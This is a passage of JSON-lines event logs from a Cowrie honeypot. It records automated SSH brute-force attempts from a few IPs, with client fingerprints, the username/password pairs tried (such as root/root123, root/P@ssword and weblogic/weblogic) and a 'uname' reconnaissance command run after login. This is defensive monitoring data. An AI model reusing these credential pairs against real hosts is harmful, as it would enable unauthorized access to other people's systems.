6","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:10.623554Z","src_ip":"83.168.105.65","session":"9f95a93bc18c"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:10.666373Z","src_ip":"212.227.125.160","session":"b427c32500ff"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:51:10.746473Z","src_ip":"83.168.105.65","session":"9f95a93bc18c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:51:10.898972Z","src_ip":"83.168.105.65","session":"9f95a93bc18c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:51:10.899682Z","src_ip":"83.168.105.65","session":"9f95a93bc18c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:10.941209Z","src_ip":"83.168.105.65","session":"9f95a93bc18c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:10.942196Z","src_ip":"83.168.105.65","session":"9f95a93bc18c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:11.717747Z","src_ip":"212.227.125.160","session":"b427c32500ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54946,"dst_ip":"1.2.3.4","dst_port":22,"session":"3845843eb6c6","protocol":"ssh","message":"New connection: 212.227.125.160:54946 (1.2.3.4:22) [session: 3845843eb6c6]","sensor":"my-vps","timestamp":"2025-08-26T11:51:15.692128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:15.692895Z","src_ip":"212.227.125.160","session":"3845843eb6c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:15.752385Z","src_ip":"212.227.125.160","session":"3845843eb6c6"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:15.959538Z","src_ip":"212.227.125.160","session":"3845843eb6c6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:17.020344Z","src_ip":"212.227.125.160","session":"3845843eb6c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55714,"dst_ip":"1.2.3.4","dst_port":22,"session":"24a501dd745b","protocol":"ssh","message":"New connection: 212.227.125.160:55714 (1.2.3.4:22) [session: 24a501dd745b]","sensor":"my-vps","timestamp":"2025-08-26T11:51:21.897132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:21.898104Z","src_ip":"212.227.125.160","session":"24a501dd745b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:21.951324Z","src_ip":"212.227.125.160","session":"24a501dd745b"}
{"eventid":"cowrie.login.failed","username":"odoo17","password":"odoo17","message":"login attempt [odoo17/odoo17] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:22.139628Z","src_ip":"212.227.125.160","session":"24a501dd745b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:23.192149Z","src_ip":"212.227.125.160","session":"24a501dd745b"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":44018,"dst_ip":"1.2.3.4","dst_port":22,"session":"be478362cd3f","protocol":"ssh","message":"New connection: 83.168.105.65:44018 (1.2.3.4:22) [session: be478362cd3f]","sensor":"my-vps","timestamp":"2025-08-26T11:51:26.174793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:26.175952Z","src_ip":"83.168.105.65","session":"be478362cd3f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:26.216158Z","src_ip":"83.168.105.65","session":"be478362cd3f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:26.361434Z","src_ip":"83.168.105.65","session":"be478362cd3f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:27.401358Z","src_ip":"83.168.105.65","session":"be478362cd3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56480,"dst_ip":"1.2.3.4","dst_port":22,"session":"baa0b7710b41","protocol":"ssh","message":"New connection: 212.227.125.160:56480 (1.2.3.4:22) [session: baa0b7710b41]","sensor":"my-vps","timestamp":"2025-08-26T11:51:27.532643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:27.533681Z","src_ip":"212.227.125.160","session":"baa0b7710b41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:27.585371Z","src_ip":"212.227.125.160","session":"baa0b7710b41"}
{"eventid":"cowrie.login.failed","username":"adminuser","password":"adminuser","message":"login attempt [adminuser/adminuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:28.045183Z","src_ip":"212.227.125.160","session":"baa0b7710b41"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:29.113319Z","src_ip":"212.227.125.160","session":"baa0b7710b41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39538,"dst_ip":"1.2.3.4","dst_port":23,"session":"2bdd7571e373","protocol":"telnet","message":"New connection: 212.227.235.229:39538 (1.2.3.4:23) [session: 2bdd7571e373]","sensor":"my-vps","timestamp":"2025-08-26T11:51:29.926718Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57258,"dst_ip":"1.2.3.4","dst_port":22,"session":"88af042ac041","protocol":"ssh","message":"New connection: 212.227.125.160:57258 (1.2.3.4:22) [session: 88af042ac041]","sensor":"my-vps","timestamp":"2025-08-26T11:51:33.840534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:33.841246Z","src_ip":"212.227.125.160","session":"88af042ac041"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:33.893076Z","src_ip":"212.227.125.160","session":"88af042ac041"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:51:34.062984Z","src_ip":"212.227.125.160","session":"88af042ac041"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:51:34.187892Z","src_ip":"212.227.125.160","session":"88af042ac041"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:51:34.188729Z","src_ip":"212.227.125.160","session":"88af042ac041"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:34.242039Z","src_ip":"212.227.125.160","session":"88af042ac041"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:34.243144Z","src_ip":"212.227.125.160","session":"88af042ac041"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58024,"dst_ip":"1.2.3.4","dst_port":22,"session":"e193f079c68c","protocol":"ssh","message":"New connection: 212.227.125.160:58024 (1.2.3.4:22) [session: e193f079c68c]","sensor":"my-vps","timestamp":"2025-08-26T11:51:39.915334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:39.944654Z","src_ip":"212.227.125.160","session":"e193f079c68c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:39.997975Z","src_ip":"212.227.125.160","session":"e193f079c68c"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:51:40.190423Z","src_ip":"212.227.125.160","session":"e193f079c68c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:51:40.374450Z","src_ip":"212.227.125.160","session":"e193f079c68c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:51:40.375160Z","src_ip":"212.227.125.160","session":"e193f079c68c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:40.429248Z","src_ip":"212.227.125.160","session":"e193f079c68c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:40.430271Z","src_ip":"212.227.125.160","session":"e193f079c68c"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":58292,"dst_ip":"1.2.3.4","dst_port":22,"session":"74b976de6ba9","protocol":"ssh","message":"New connection: 83.168.105.65:58292 (1.2.3.4:22) [session: 74b976de6ba9]","sensor":"my-vps","timestamp":"2025-08-26T11:51:41.541895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:41.542680Z","src_ip":"83.168.105.65","session":"74b976de6ba9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:41.589134Z","src_ip":"83.168.105.65","session":"74b976de6ba9"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:41.701282Z","src_ip":"83.168.105.65","session":"74b976de6ba9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:42.739778Z","src_ip":"83.168.105.65","session":"74b976de6ba9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58800,"dst_ip":"1.2.3.4","dst_port":22,"session":"487c99f616b6","protocol":"ssh","message":"New connection: 212.227.125.160:58800 (1.2.3.4:22) [session: 487c99f616b6]","sensor":"my-vps","timestamp":"2025-08-26T11:51:45.514883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:45.515867Z","src_ip":"212.227.125.160","session":"487c99f616b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:45.607470Z","src_ip":"212.227.125.160","session":"487c99f616b6"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:46.048920Z","src_ip":"212.227.125.160","session":"487c99f616b6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:47.187711Z","src_ip":"212.227.125.160","session":"487c99f616b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59568,"dst_ip":"1.2.3.4","dst_port":22,"session":"da2a94978054","protocol":"ssh","message":"New connection: 212.227.125.160:59568 (1.2.3.4:22) [session: da2a94978054]","sensor":"my-vps","timestamp":"2025-08-26T11:51:51.150722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:51.151433Z","src_ip":"212.227.125.160","session":"da2a94978054"}
